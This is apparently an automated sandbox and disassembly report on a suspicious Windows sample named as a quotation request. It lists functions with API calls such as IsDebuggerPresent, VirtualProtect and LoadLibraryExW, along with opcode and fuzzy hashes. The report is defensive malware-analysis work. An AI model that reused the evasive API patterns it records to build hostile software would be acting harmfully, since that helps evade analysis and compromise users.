Part of subcall function 00FD48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00FD492A

Part of subcall function 00FD3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FD3B68
Part of subcall function 00FD3B3A: IsDebuggerPresent.KERNEL32 ref: 00FD3B7A
Part of subcall function 00FD3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,010952F8,010952E0,?,?), ref: 00FD3BEB
Part of subcall function 00FD3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00FD3C6F

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00FD4874

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 10777bfcaf87287fd6ece23b87f16f174da25cea061c54a091829269b4c189b9
Instruction ID: 180063fde083afb6c0a144a69151c560e11d3b17b607c46a483cbec8ff4c8dad
Opcode Fuzzy Hash: 10777bfcaf87287fd6ece23b87f16f174da25cea061c54a091829269b4c189b9
Instruction Fuzzy Hash: 6F119D719083459BC710EF69DC1590EBFE9FF89750F10451FF080972A1DBBAA544DB92

Function 00FF0DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00FF571C: __FF_MSGBANNER.LIBCMT ref: 00FF5733
Part of subcall function 00FF571C: __NMSG_WRITE.LIBCMT ref: 00FF573A
Part of subcall function 00FF571C: RtlAllocateHeap.NTDLL(01560000,00000000,00000001,00000000,?,?,?,00FF0DD3,?), ref: 00FF575F

std::exception::exception.LIBCMT ref: 00FF0DEC
__CxxThrowException@8.LIBCMT ref: 00FF0E01

Part of subcall function 00FF859B: RaiseException.KERNEL32(?,?,?,01089E78,00000000,?,?,?,?,00FF0E06,?,01089E78,?,00000001), ref: 00FF85F0

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: a18fd75420588bb3e6cbfab49d56cff13f8810e3e44dc2be353c7099e8ddae96
Instruction ID: 3e3302a01b659197d341cbd86be375ff473766beb5c163f85c5515de5d8623e6
Opcode Fuzzy Hash: a18fd75420588bb3e6cbfab49d56cff13f8810e3e44dc2be353c7099e8ddae96
Instruction Fuzzy Hash: F1F0A432D0021E66CB14FA94EC019FE7BAC9F113A1F104469FB44961A2EF749A81A6D1

Function 00FF55FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FF562C
__lock_file.LIBCMT ref: 00FF564D

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: 9777a9315467a5a40f9bc223e5e8bf983b13479f3f8c6114b58c50178a7926c4
Instruction ID: e49c649dd819bcd0cb70894708a149bcdef2c7acd26b2c4e1a4587dda05b5e8e
Opcode Fuzzy Hash: 9777a9315467a5a40f9bc223e5e8bf983b13479f3f8c6114b58c50178a7926c4
Instruction Fuzzy Hash: AA01F771C00A0CEBCF22AF648C024BE7B61AF90B61F404115FB249B271DB798A12FF91

Function 00FF53A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00FF8B28: __getptd_noexit.LIBCMT ref: 00FF8B28

__lock_file.LIBCMT ref: 00FF53EB

Part of subcall function 00FF6C11: __lock.LIBCMT ref: 00FF6C34

__fclose_nolock.LIBCMT ref: 00FF53F6

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 285f36b519f068d5aef62047a84ea3311c76d511bf86f8c0bedbce0206f91b90
Instruction ID: 57c093b3f3e0d56ae4c1a1f5cb200a4ddafe3146c0ce4cb0a750fd3cc957dba0
Opcode Fuzzy Hash: 285f36b519f068d5aef62047a84ea3311c76d511bf86f8c0bedbce0206f91b90
Instruction Fuzzy Hash: 54F09631D00A1C9ADB21AB799C017BD76A16F41BB5F208109A764AB1F1DFFC8942BB51

Function 015F93F8 Relevance: 1.7, APIs: 1, Instructions: 167COMMON

Download Yara Rule

APIs

Part of subcall function 015F8C68: GetFileAttributesW.KERNELBASE(?), ref: 015F8C73

CreateDirectoryW.KERNELBASE(?,00000000), ref: 015F9554

Memory Dump Source

Source File: 00000000.00000002.2096794282.00000000015F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15f8000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: f72203a90bfe8f9a9e0d21d36c6fe58f0e77eb9e5218cad69cac12bb04472677
Instruction ID: 338959c78a29a608f96db1769ae68f2ea147f52b2d89db060639c026ca7d24ad
Opcode Fuzzy Hash: f72203a90bfe8f9a9e0d21d36c6fe58f0e77eb9e5218cad69cac12bb04472677
Instruction Fuzzy Hash: B5515031A1020996EF14DFA4D854BEF733AFF58700F00556DE709EB280EB759A85CB65

Function 00FF0C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00FF0CB7

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 696c99a35b8e1faff84c9fbe07ca3b2ffb85f2f94844093b2d181b0ff60047b5
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: FE31D2B5A001099BC718DF58C484A79F7A6FF59310B6487A5E90ACB366DB31EDC1EBC0

Function 0100FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0100FCB7

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: d2d90ac773c4389afbe5f55a844079a6234281d593490553b840941fa6b30816
Instruction ID: 4c928acc6c3ebef1ff82b9fdef933cb40537aff8a683cae79995b68cfcc7d347
Opcode Fuzzy Hash: d2d90ac773c4389afbe5f55a844079a6234281d593490553b840941fa6b30816
Instruction Fuzzy Hash: 4A413774A08341CFDB25DF28C444B1ABBE2BF45318F09889DE9998B362C776E845DF52

Function 00FD7B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FD7BB3

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 7f6e71663044f3a5b7a9fb1dbbbe17077ddc8676293e9c7112b34bae4d665b57
Instruction ID: 8f8ce9103ddf9d578942536f28f74c39229633f5474b3765a6eac8be58543549
Opcode Fuzzy Hash: 7f6e71663044f3a5b7a9fb1dbbbe17077ddc8676293e9c7112b34bae4d665b57
Instruction Fuzzy Hash: 03212772A08B0DEBEB255F25E841BAD7BB5FF44350F28882AE4C5D91D5EB328090D705

Function 00FD4DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00FD4BEF

Part of subcall function 00FF525B: __wfsopen.LIBCMT ref: 00FF5266

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,010952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FD4E0F

Part of subcall function 00FD4B6A: FreeLibrary.KERNEL32(00000000), ref: 00FD4BA4

Part of subcall function 00FD4C70: _memmove.LIBCMT ref: 00FD4CBA

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 57ed0563b569a1027702821b7ab0f802737e55c790c0352bc1c9d4daa9b38cf6
Instruction ID: 66e7375f1b52e2f0ec7a658ec431521d505c1a314bbbc2160062d3eec918a423
Opcode Fuzzy Hash: 57ed0563b569a1027702821b7ab0f802737e55c790c0352bc1c9d4daa9b38cf6
Instruction Fuzzy Hash: 7111EB31600206B7DF11FFB4CC12F6D77A6AF84710F14842FF545A7281DA79AA00B751

Function 0100FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 0100FD91

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: ca414df356994740d43b3e3a855bd75c182d1ec700b620d22d8f9104985ce261
Instruction ID: 34987fb3b5dfcd1aa57fde54e2c0fa0b218fe9f5406dbda92cb105ba300f7c64
Opcode Fuzzy Hash: ca414df356994740d43b3e3a855bd75c182d1ec700b620d22d8f9104985ce261
Instruction Fuzzy Hash: 8B212674908341DFDB14DF64C844B1ABBE2BF88314F09895DF98957722D735E805DB92

Function 00FD7DE1 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FD7E22

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 780b5f4b535862ec9aa498d1c1170bc452af963c85821d066a2fd30774ee0a14
Instruction ID: 33d0c2009ed11e73dd0636fb7e3c79eb5f0055736c1e56b287a083bf0fe55f63
Opcode Fuzzy Hash: 780b5f4b535862ec9aa498d1c1170bc452af963c85821d066a2fd30774ee0a14
Instruction Fuzzy Hash: 64012B722003056EC320AF69CC06F7777959F44360F14852AF61ACE2A1EE35E440A790

Function 00FF072A Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FF07B0

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 75527f81eef7fd904e20a4994de80c1dbf6295db52c90ce1c282923914999723
Instruction ID: 50c3c6415f5cf0ecc5c8fa82901ff0e28e0a8bff4a1a30cfb863484361b69722
Opcode Fuzzy Hash: 75527f81eef7fd904e20a4994de80c1dbf6295db52c90ce1c282923914999723
Instruction Fuzzy Hash: 48F0C8725441946FC3215B749C899F6BFB8EFC7264B1841FBECC88E926E9254847C7C1

Function 00FF4863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00FF48A6

Part of subcall function 00FF8B28: __getptd_noexit.LIBCMT ref: 00FF8B28

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 2ea42835b527c2f18086d3c3d46cf9969564db06d80a2a4bcb500f3049688cf0
Instruction ID: 5fc1944fb7f8a07fe26dd0c4beb06958f56d075cbae64c70ff8181e4fb76bebe
Opcode Fuzzy Hash: 2ea42835b527c2f18086d3c3d46cf9969564db06d80a2a4bcb500f3049688cf0
Instruction Fuzzy Hash: 68F0FF3290020CABDF21AFB48C063BF36A0AF007A6F008404B6209A1B1DBBC8952FB51

Function 00FD4E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,010952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FD4E7E

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 0f8e87b8ab2299ea487051b0b5086a159bc90f10ccf729fd88924486b589b63d
Instruction ID: e38b6ea64af4bc267306c7bc008bf28744d11dc9cb8b9ab2436b1ce2ad52d7ce
Opcode Fuzzy Hash: 0f8e87b8ab2299ea487051b0b5086a159bc90f10ccf729fd88924486b589b63d
Instruction Fuzzy Hash: 35F01C71501711DFCB349F64D494812B7E2BF14335318896EE2D682710C776A840EB40

Function 00FF0791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FF07B0

Part of subcall function 00FD7BCC: _memmove.LIBCMT ref: 00FD7C06

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: e12b5f801011d1cead23d71057e0f372f75a47cb83042841e421ee0af191b514
Instruction ID: b6b658512db3a0eaf43509d971d27a579c7d901ec2568a935423a8e5f45315c7
Opcode Fuzzy Hash: e12b5f801011d1cead23d71057e0f372f75a47cb83042841e421ee0af191b514
Instruction Fuzzy Hash: F2E0867690422957C721A5689C05FEA77DDDBC86A0F0441B6FD4CD7248D9659C808690

Function 01038E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 01038EC1

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
Instruction ID: 9ce9ad7dfa3a84a66e62a45ccc5d1deb4cc6ac72920d7388cb034aba32f04b60
Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
Instruction Fuzzy Hash: 93E092B0104B045FD7398A28D800BA377E5AB05305F04099DF2EA83242EB6278458759

Function 015F8C68 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 015F8C73

Memory Dump Source

Source File: 00000000.00000002.2096794282.00000000015F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15f8000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction ID: 07fd0a6f6419b041d66274f96095605522869d9b9a2ce30b1d45b70a790f9327
Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction Fuzzy Hash: 78E0EC31956208EBDB54CAB8D904BAE7BA9BB05320F144A99EB26CF280E6319A50D754

Function 015F8C38 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 015F8C43

Memory Dump Source

Source File: 00000000.00000002.2096794282.00000000015F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15f8000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction ID: dfc75a7e5879f816d6c4e50b823d95171fca839ca40e995b6d5ddaf20ac71f2d
Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction Fuzzy Hash: F2D0A73090620CEBCF10CFB8DD08ADE73A8E705320F008B58FE19CF280D53199049750

Function 00FF525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00FF5266

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: f90413dfbd64c80c5f5f0d197ff2bd5c3e8347fb515e7ee6ccc792dff290d58a
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 01B0927644020C77CE012A82FC02A593F199B42B64F408020FB0C18172E677A664AA89

Function 015FA654 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 015FA669

Memory Dump Source

Source File: 00000000.00000002.2096794282.00000000015F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15f8000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: bea6a63df44f51384d3ceccabd7f7d04b4ccc1a03231ac4cb17ee60328a0671a
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: F1E09A7494010DAFDB00DFA4D54969E7BB4EF04301F1006A5FD0597680DA309A548A66

Function 015FA658 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 015FA669

Memory Dump Source

Source File: 00000000.00000002.2096794282.00000000015F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15f8000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 0793bb39cf3b33203964f5ba5ddb2972f6054f572a3581ae00a6da22b06a10b7
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: DBE0E67494010DDFDB00DFB4D54D69E7BB4FF04301F100265FD05D2280D6309D508A62

